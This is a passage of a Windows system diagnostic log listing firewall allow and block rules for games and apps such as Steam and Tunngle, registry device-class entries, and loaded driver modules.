"{87C92A4D-79A0-4F09-BAF8-CA5690B50EE8}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=8090|Name=War Thunder|
"TCP Query User{891ED405-05F4-41A4-97CF-FB4E4DE04750}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe|Name=Java(TM) Platform SE binary|Desc=Java(TM) Platform SE binary|Defer=User|
"UDP Query User{0A80172B-7240-4638-817E-CCB679AA0B82}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe|Name=Java(TM) Platform SE binary|Desc=Java(TM) Platform SE binary|Defer=User|
"{BB955D30-2C48-41CE-88A5-E01893CE2F91}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Grand Theft Auto IV - Episodes From Liberty City\EFLC.exe|Name=Grand Theft Auto IV - Episodes From Liberty City|
"{A803A2AB-6942-4224-9D58-6EC86C76F424}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Grand Theft Auto IV - Episodes From Liberty City\EFLC.exe|Name=Grand Theft Auto IV - Episodes From Liberty City|
"TCP Query User{25C2A9C0-3385-4C73-BFF1-DB4F1E82FF83}C:\users\pc\appdata\roaming\gameranger\gameranger\gameranger.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\pc\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User|
"UDP Query User{308BBC45-4C4B-4EF7-BFA8-7BA88A1A1959}C:\users\pc\appdata\roaming\gameranger\gameranger\gameranger.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\pc\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User|
"TCP Query User{A358F94B-A058-423E-9D4C-EB3EB2FE4A0C}C:\program files\awar\iron front - liberation 1944\ironfront.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\program files\awar\iron front - liberation 1944\ironfront.exe|Name=Ironfront|Desc=Ironfront|Defer=User|
"UDP Query User{107C471A-E095-4804-8557-614283B5794A}C:\program files\awar\iron front - liberation 1944\ironfront.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\program files\awar\iron front - liberation 1944\ironfront.exe|Name=Ironfront|Desc=Ironfront|Defer=User|
"{8005B8A5-5F7A-4481-8AC4-6DB60196A753}"=v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\Skype\Phone\Skype.exe|Name=Skype|
"{3961D346-16F9-4ED0-868A-4421D40FA6E2}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|App=C:\Users\PC\AppData\Roaming\uTorrent\uTorrent.exe|Name=µTorrent (TCP-In)|Desc=Allow µTorrent network traffic with Edge Traversal|Edge=TRUE|
"{27BEF9BB-C485-41E5-A632-3D6C360CA134}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|App=C:\Users\PC\AppData\Roaming\uTorrent\uTorrent.exe|Name=µTorrent (UDP-In)|Desc=Allow µTorrent network traffic with Edge Traversal|Edge=TRUE|
"TCP Query User{B1B00CCB-A0FA-4AB1-A9E7-4752328DCD35}D:\r.g. catalyst\assassin`s creed iii\ac3sp.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=D:\r.g. catalyst\assassin`s creed iii\ac3sp.exe|Name=AC3SP|Desc=AC3SP|Defer=User|
"UDP Query User{E7F53F6A-5507-41DE-8C53-3E3214DBF693}D:\r.g. catalyst\assassin`s creed iii\ac3sp.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=D:\r.g. catalyst\assassin`s creed iii\ac3sp.exe|Name=AC3SP|Desc=AC3SP|Defer=User|
"{C6AA0DDE-5101-4112-9B8F-D78A6136079A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Mr DJ\Sid Meier's Civilization V The Complete Edition repack Mr DJ\Launcher.exe|Name=Launcher.exe|
"{FF9A2ED5-C35C-4272-85BC-2F4CBC2149A2}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Mr DJ\Sid Meier's Civilization V The Complete Edition repack Mr DJ\Launcher.exe|Name=Launcher.exe|
"{DD7518A6-ABAC-4E52-9051-F06E78B6432A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27000|Name=steam 27000|
"{F0C6E693-CDD0-4EEF-B20E-0CF89244E59D}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27001|Name=steam 27001|
"{9AB49406-A8D2-4D25-84D8-BF1106396026}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27002|Name=steam 27002|
"{33C39420-9DA6-4AA7-8603-B1BEAB836133}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27003|Name=steam 27003|
"{7790BA94-DAEB-49B3-8BF0-E986C1946803}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27004|Name=steam 27004|
"{6F74427D-3C45-4B6F-86A7-4D07AD9A2AF2}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27005|Name=steam 27005|
"{A059F444-2CB4-438B-ABFF-D4AE4C12D352}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27006|Name=steam 27006|
"{AB1C7448-742E-4986-9836-A9784997817E}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27007|Name=steam 27007|
"{EBD41DAF-269B-461E-A58D-5E66D6022EDA}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27008|Name=steam 27008|
"{3CAFE8EF-FFF9-45F9-83BF-362C48009CF6}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27009|Name=steam 27009|
"{C1332132-5DE8-4BCC-96AD-503B4B97C4C5}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27010|Name=steam 27010|
"{33C98B3F-0C54-4F2C-A100-3D44E7E70D33}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27011|Name=steam 27011|
"{C5C63CD3-D6F3-4001-9FA4-EDD0D3E85462}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27012|Name=steam 27012|
"{00DF13EA-4CC9-49B9-9C36-9E2E61E194C4}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27013|Name=steam 27013|
"{DE8B21E6-CB72-42CE-ACB6-6B8CE11C8501}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27014|Name=steam 27014|
"{B117D29B-3473-4F7C-A49D-AD45B0EA307A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27015|Name=steam 27015|
"{DDE40B75-1F5C-4314-828F-C51C78C05FCB}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27016|Name=steam 27016|
"{1FBEA923-EC83-458B-BD88-DF49263EB40E}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27017|Name=steam 27017|
"{E1016AEA-BFF7-4F2E-B902-149E8988D336}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27018|Name=steam 27018|
"{BCFEDEFD-ABC8-4D46-AA57-D8348EB568CE}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27019|Name=steam 27019|
"{640806A2-FC98-43C8-BFBE-FC2E7E14754A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27020|Name=steam 27020|
"{B9B178D9-BB25-4A94-96EC-141068ED322A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27021|Name=steam 27021|
"{C3CC2EFB-CE4B-4634-A108-32DF309AD5A3}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27022|Name=steam 27022|
"{CB62503D-8EB8-49B9-A2ED-DAB7385CF350}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27023|Name=steam 27023|
"{4D25DDC2-A359-453A-831B-5EFE4B90FC27}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27024|Name=steam 27024|
"{046A7A2C-2004-4F01-AF07-03667C85D5F5}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27025|Name=steam 27025|
"{7A1D1622-991A-4BEC-92D3-0E3B0D2387CD}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27026|Name=steam 27026|
"{E23DDC34-C472-42D3-9609-29166E504F3E}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27027|Name=steam 27027|
"{EBD87FB6-E1EE-4FE5-BF6E-38D0F4A7E0AB}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27028|Name=steam 27028|
"{89857B12-13A8-4D4A-B1AD-2FA4B7829811}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27029|Name=steam 27029|
"{84C43CAA-0FD0-4B2B-8FFC-1178AB6FED7B}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27030|Name=steam 27030|
"{927C44CB-8CBF-4A44-A852-7978A743156A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27031|Name=steam 27031|
"{60D09347-C6C0-4F8B-B05D-DF8580D38FE6}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27032|Name=steam 27032|
"{A3A80270-F80D-4726-83D6-9A2ACC3A6B9C}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27033|Name=steam 27033|
"{E6496DA6-F2C6-4F1D-A3D0-6B1A37D33700}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27034|Name=steam 27034|
"{5035C0AB-8EEB-4EE3-801B-C79DB9EB02B6}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27035|Name=steam 27035|
"{BA1C99D8-B446-47DF-AE2F-7832B12F2C75}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=27036|Name=steam 27036|
"{C64E0423-8357-441D-9FC4-BC63AB04E9FB}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=27036|Name=steam TCP 27036|
"{7DD650FD-4616-44B4-9193-357632E8EBF0}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=27037|Name=steam TCP 27037|
"{D6A1FE0D-F422-494F-B6D7-D2351EAA632B}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=4380|Name=steam 4380|
"{08D90CFE-6442-4C9C-8F86-43D7BD05167A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=27015|Name=steam TCP 27015|
"TCP Query User{8A0C6D48-AE21-4BFC-AB2A-44F5805C7D45}D:\power geopolitical\power & revolution\_start.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=D:\power geopolitical\power & revolution\_start.exe|Name=_geolib|Desc=_geolib|Defer=User|
"UDP Query User{1D8EC872-05A3-412D-B913-A616511B5475}D:\power geopolitical\power & revolution\_start.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=D:\power geopolitical\power & revolution\_start.exe|Name=_geolib|Desc=_geolib|Defer=User|
"{F0D618D2-EB43-422C-956E-6C404845B99D}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Tunngle\TnglCtrl.exe|Name=Tunngle Service|
"{C2028104-5EE2-409B-8932-6BB87B93A87C}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Tunngle\TnglCtrl.exe|Name=Tunngle Service|
"{D7CCA7A9-4464-495C-9DEF-C95D069D3F3E}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Tunngle\Tunngle.exe|Name=Tunngle Client|
"{F96C5BD2-0221-4B25-8F43-3029D73E3807}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Tunngle\Tunngle.exe|Name=Tunngle Client|
"TCP Query User{BF88E274-4744-476C-9A4F-03DA9C8F199E}C:\program files (x86)\rockstar games\relic entertainment\company of heroes - complete edition\reliccoh.exe"=v2.10|Action=Block|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\program files (x86)\rockstar games\relic entertainment\company of heroes - complete edition\reliccoh.exe|Name=The build server will stamp this field|Desc=The build server will stamp this field|
"UDP Query User{EF83FDD5-9BD9-46E2-9470-F7B565DD9E2A}C:\program files (x86)\rockstar games\relic entertainment\company of heroes - complete edition\reliccoh.exe"=v2.10|Action=Block|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\program files (x86)\rockstar games\relic entertainment\company of heroes - complete edition\reliccoh.exe|Name=The build server will stamp this field|Desc=The build server will stamp this field|
"TCP Query User{0F86A606-4E09-43F8-B554-D2F7FA4764C9}C:\program files (x86)\eidos\battlestations pacific\bsp.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\program files (x86)\eidos\battlestations pacific\bsp.exe|Name=Battlestations: Pacific|Desc=Battlestations: Pacific|Defer=User|
"UDP Query User{17046339-1DA5-4E1B-B5A7-A53DC8B74506}C:\program files (x86)\eidos\battlestations pacific\bsp.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\program files (x86)\eidos\battlestations pacific\bsp.exe|Name=Battlestations: Pacific|Desc=Battlestations: Pacific|Defer=User|
"{19AAE4E5-DA74-46D6-BF91-BA87B5BFA65A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\fdm.exe|Name=Free Download Manager|
"{75371776-0EC5-4289-A6B4-D9FAE99F9F8B}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\fdm.exe|Name=Free Download Manager|
"{BC6ACB3D-D864-4B49-A618-25986B35F07E}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Règle de trafic entrant pour Google Chrome autorisant le trafic mDNS|EmbedCtxt=Google Chrome|
"TCP Query User{2596FDB3-C737-4D6B-BC49-34AA13583289}D:\patrician iv gold edition\patrician4_addon.exe"=v2.10|Action=Block|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=D:\patrician iv gold edition\patrician4_addon.exe|Name=Patrician IV|Desc=Patrician IV|
"UDP Query User{BAD89427-8011-455A-B54C-496AAE274AF5}D:\patrician iv gold edition\patrician4_addon.exe"=v2.10|Action=Block|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=D:\patrician iv gold edition\patrician4_addon.exe|Name=Patrician IV|Desc=Patrician IV|





---------- | Control\Class

[HKLM\SYSTEM\CurrentControlSet\Control\Class\{03F52937-1FD6-44FB-82C6-FE988F1B1D61}] : (aswSP) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{0475BB51-5A02-4EE0-B36C-29040FAD2650}] : (amdkmdap) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{1264760F-A5C8-4BFE-B314-D56A7B44A362}] : (DXGKrnl) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{25DBCE51-6C8F-4A72-8A6D-B54C2B4FC835}] : (WCEUSBS) [] -> @%SystemRoot%\System32\SysClass.Dll,-3026
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{36FC9E60-C465-11CF-8056-444553540000}] : (USB) [] -> @%SystemRoot%\System32\SysClass.Dll,-3025
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4116F60B-25B3-4662-B732-99A6111EDC0B}] : (IPMIDRV) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{43675D81-502A-4A82-9F84-B75F418C5DEA}] : (Media Center Extender) [] -> @%SystemRoot%\system32\McxDriv.dll,-100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4658EE7E-F050-11D1-B6BD-00C04FA372A7}] : (PnpPrinters) [] -> @%systemroot%\system32\ntprint.dll,-1300
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{48721B56-6795-11D2-B1A8-0080C72E74A2}] : (Dot4) [] -> @%SystemRoot%\system32\sysclass.dll,-3023
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{49CE6AC8-6F86-11D2-B1E5-0080C72E74A2}] : (Dot4Print) [] -> @%SystemRoot%\system32\sysclass.dll,-3024
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}] : (CDROM) [] -> @%SystemRoot%\System32\StorProp.dll,-17001
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E966-E325-11CE-BFC1-08002BE10318}] : (Computer) [] -> @%SystemRoot%\System32\SysClass.dll,-3000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E967-E325-11CE-BFC1-08002BE10318}] : (DiskDrive) [] -> @%SystemRoot%\System32\StorProp.dll,-17000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}] : (Display) [] -> @DispCI.dll,-3100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E969-E325-11CE-BFC1-08002BE10318}] : (fdc) [] -> @%SystemRoot%\System32\SysClass.Dll,-3013
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}] : (hdc) [] -> @%SystemRoot%\System32\SysClass.Dll,-3001
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318}] : (Keyboard) [] -> @%SystemRoot%\System32\SysClass.Dll,-3002
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96C-E325-11CE-BFC1-08002BE10318}] : (MEDIA) [] -> @mmci.dll,-3000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}] : (Modem) [] -> @%SystemRoot%\System32\mdminst.dll,-14100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96E-E325-11CE-BFC1-08002BE10318}] : (Monitor) [] -> @Montr_CI.dll,-3100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96F-E325-11CE-BFC1-08002BE10318}] : (Mouse) [] -> @%SystemRoot%\System32\SysClass.Dll,-3004
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E970-E325-11CE-BFC1-08002BE10318}] : (MTD) [] -> @SysClass.Dll,-3021
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E971-E325-11CE-BFC1-08002BE10318}] : (MultiFunction) [] -> @%SystemRoot%\System32\SysClass.Dll,-3014
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}] : (Net) [] -> @NetCfgx.dll,-1502
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E973-E325-11CE-BFC1-08002BE10318}] : (NetClient) [] -> @NetCfgx.dll,-1504
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E974-E325-11CE-BFC1-08002BE10318}] : (NetService) [] -> @NetCfgx.dll,-1505
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E975-E325-11CE-BFC1-08002BE10318}] : (NetTrans) [] -> @NetCfgx.dll,-1503
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E977-E325-11CE-BFC1-08002BE10318}] : (PCMCIA) [] -> @%SystemRoot%\System32\SysClass.Dll,-3010
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E978-E325-11CE-BFC1-08002BE10318}] : (Ports) [] -> @%SystemRoot%\System32\msports.dll,-10000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E979-E325-11CE-BFC1-08002BE10318}] : (Printer) [] -> @%systemroot%\system32\ntprint.dll,-1004
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E97B-E325-11CE-BFC1-08002BE10318}] : (SCSIAdapter) [] -> @%SystemRoot%\System32\SysClass.Dll,-3005
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E97D-E325-11CE-BFC1-08002BE10318}] : (System) [] -> @%SystemRoot%\System32\SysClass.Dll,-3008
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E97E-E325-11CE-BFC1-08002BE10318}] : (Unknown) [] -> @%SystemRoot%\System32\SysClass.Dll,-3009
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E980-E325-11CE-BFC1-08002BE10318}] : (FloppyDisk) [] -> @%SystemRoot%\System32\SysClass.Dll,-3015
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{50127DC3-0F36-415E-A6CC-4CB3BE910B65}] : (Processor) [] -> @%SystemRoot%\system32\procinst.dll,-100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{50906CB8-BA12-11D1-BF5D-0000F805F530}] : (MultiPortSerial) [] -> @%SystemRoot%\system32\sysclass.dll,-3022
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{5099944A-F6B9-4057-A056-8C550228544C}] : (Memory) [] -> @%SystemRoot%\System32\SysClass.Dll,-3018
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{50DD5230-BA8A-11D1-BF5D-0000F805F530}] : (SmartCardReader) [] -> @StorProp.dll,-17002
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{5175D334-C371-4806-B3BA-71FD53C9258D}] : (Sensor) [] -> @%systemroot%\system32\SensorsCpl.dll,-10000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{522119B9-1B9A-498A-AC52-148B533EFD50}] : (aswSP) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{533C5B84-EC70-11D2-9505-00C04F79DEAF}] : (VolumeSnapshot) [] -> @%SystemRoot%\System32\SysClass.Dll,-3011
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{53D29EF7-377C-4D14-864B-EB3A85769359}] : (BiometricDevice) [] -> @%SystemRoot%\System32\SysClass.DLL,-3028
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}] : (1394) [] -> @%SystemRoot%\System32\SysClass.Dll,-3016
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6BDD1FC5-810F-11D0-BEC7-08002BE2092F}] : (Infrared) [] -> @NetCfgx.dll,-1501
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}] : (Image) [] -> @%systemroot%\system32\sti_ci.dll,-52
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6D807884-7D21-11CF-801C-08002BE10318}] : (TapeDrive) [] -> @%SystemRoot%\System32\SysClass.Dll,-3006
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{6FAE73B7-B735-4B50-A0DA-0DC2484B1F1A}] : (amdkmdap) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}] : (Volume) [] -> @%SystemRoot%\System32\SysClass.Dll,-3007
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{72631E54-78A4-11D0-BCF7-00AA00B7B32A}] : (Battery) [] -> @%SystemRoot%\system32\batt.dll,-100
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}] : (HIDClass) [] -> @hid.dll,-101
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{7EBEFBC0-3200-11D2-B4C2-00A0C9697D07}] : (61883) [] -> @%SystemRoot%\System32\SysClass.Dll,-3019
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{87C077B2-3D3B-4156-938A-EA51B451D6C6}] : (aswSP) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{8ECC055D-047F-11D1-A537-0000F8753ED1}] : (LegacyDriver) [] -> @%SystemRoot%\System32\SysClass.Dll,-3003
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{990A2BD7-E738-46C7-B26F-1CF8FB9F1391}] : (SmartCard) [] -> @sccls.dll,-300
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{997B5D8D-C442-4F2E-BAF3-9C8E671E9E21}] : (SideShow) [] -> @%systemroot%\system32\AuxiliaryDisplayClassInstaller.dll,-10000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{9D3039DD-CCA5-4B4D-B33D-E2DDC8A8C52E}] : (dtsoftbus01) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{A0A588A4-C46F-4B37-B7EA-C82FE89870C6}] : (SDHost) [] -> @%SystemRoot%\System32\SysClass.Dll,-3012
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{A3E32DBA-BA89-4F17-8386-2D0127FBD4CC}] : (rdpbus) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{AB4964A5-4361-4899-BA0A-180305F2BF92}] : (aswTdi) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{BC103702-DD72-406F-9B28-95C868337B59}] : (Transfer Cable) [] -> @%SystemRoot%\System32\migwiz\migres.dll,-20
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{C06FF265-AE09-48F0-812C-16753D7CBA83}] : (AVC) [] -> @%SystemRoot%\System32\SysClass.Dll,-3027
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{C4A06E97-ED42-47B9-83E1-F12299B286A5}] : (aswRdr) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{CE5939AE-EBDE-11D0-B181-0000F8753EC4}] : (MediumChanger) [] -> @%SystemRoot%\System32\StorProp.dll,-17003
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{D48179BE-EC20-11D1-B6B8-00C04FA372A7}] : (SBP2) [] -> @%SystemRoot%\System32\SysClass.Dll,-3017
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{D61CA365-5AF4-4486-998B-9DB4734C6CA3}] : (XnaComposite) [] -> @%SystemRoot%\system32\XInput9_1_0.dll,-1000
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}] : (SecurityDevices) [] -> @%SystemRoot%\System32\SysClass.Dll,-3020
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{DB4F6DDD-9C0E-45E4-9597-78DBBAD0F412}] : (SmartCardFilter) [] -> @sccls.dll,-301
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{E004269C-D387-4461-B955-25A64CFE23CE}] : (amdkmdag) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{E0CBF06C-CD8B-4647-BB8A-263B43F0F974}] : (Bluetooth) [] -> @%SystemRoot%\system32\bthci.dll,-4001
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEC5AD98-8080-425F-922A-DABF3DE3F69A}] : (WPD) [] -> @wpd_ci.dll,-101
[HKLM\SYSTEM\CurrentControlSet\Control\Class\{FB58BE68-EA9E-4803-847F-2CE814E7B159}] : (aswSP) [] -> 
[HKLM\SYSTEM\CurrentControlSet\Control\Els\Services\{2D64B439-6CAF-4f6b-B688-E5D0F4FAA7D7}] : (Script Detection) [@elscore.dll,-2] -> ElsLad.dll (Copyright (c) Microsoft Corporation.)
[HKLM\SYSTEM\CurrentControlSet\Control\Els\Services\{A22D52C1-DBFD-40cb-AE78-E3BA9EE1D88F}] : (Transliteration) [@elscore.dll,-5] -> elstrans.dll (Copyright (c) Microsoft Corporation.)
[HKLM\SYSTEM\CurrentControlSet\Control\Els\Services\{CF7E00B1-909B-4d95-A8F4-611F7C377702}] : (Language Detection) [@elscore.dll,-1] -> ElsLad.dll (Copyright (c) Microsoft Corporation.)

---------- | Loaded modules (whitelist)

[07/11/2014 17:03:40] - (4.49.1.352) - (Disc Soft Ltd - DAEMON Tools Virtual Bus Driver) - C:\Windows\system32\DRIVERS\dtsoftbus01.sys
[08/01/2017 18:25:42] - (9.0.0.6) - (Tunngle.net - TAP-Win32 Virtual Network Driver) - C:\Windows\system32\DRIVERS\tap0901t.sys
[08/07/2016 17:07:32] - (2.6.2.3143) - (Huawei Technologies Co., Ltd. - ew_jubusenum Driver) - C:\Windows\system32\DRIVERS\ew_jubusenum.sys
[07/11/2014 11:29:06] - (6.10.2.7280) - (Analog Devices, Inc. - High Definition Audio Function Driver) - C:\Windows\system32\drivers\ADIHdAud.sys

